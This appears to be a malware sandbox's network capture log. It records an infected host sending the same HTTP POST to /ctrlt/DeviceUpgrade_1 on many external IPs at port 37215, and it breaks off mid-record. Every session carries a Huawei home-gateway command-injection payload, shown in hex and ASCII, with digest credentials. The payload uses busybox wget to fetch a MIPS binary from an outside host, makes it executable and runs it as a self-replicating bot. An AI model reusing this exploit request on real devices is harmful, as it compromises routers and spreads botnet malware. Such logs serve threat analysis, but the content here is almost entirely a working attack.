                                                  May 29, 2024 15:15:25.030661106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.490669012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2253192.168.2.135086641.243.131.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779318094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2254192.168.2.134590098.194.239.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779360056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2255192.168.2.133932678.253.109.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779376984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2256192.168.2.134686641.98.72.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779392004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2257192.168.2.1335610197.145.71.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779409885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2258192.168.2.133776241.176.168.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779426098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2259192.168.2.1341910197.51.121.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779433012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2260192.168.2.133516241.156.212.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779438972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2261192.168.2.1335592157.125.179.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779544115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
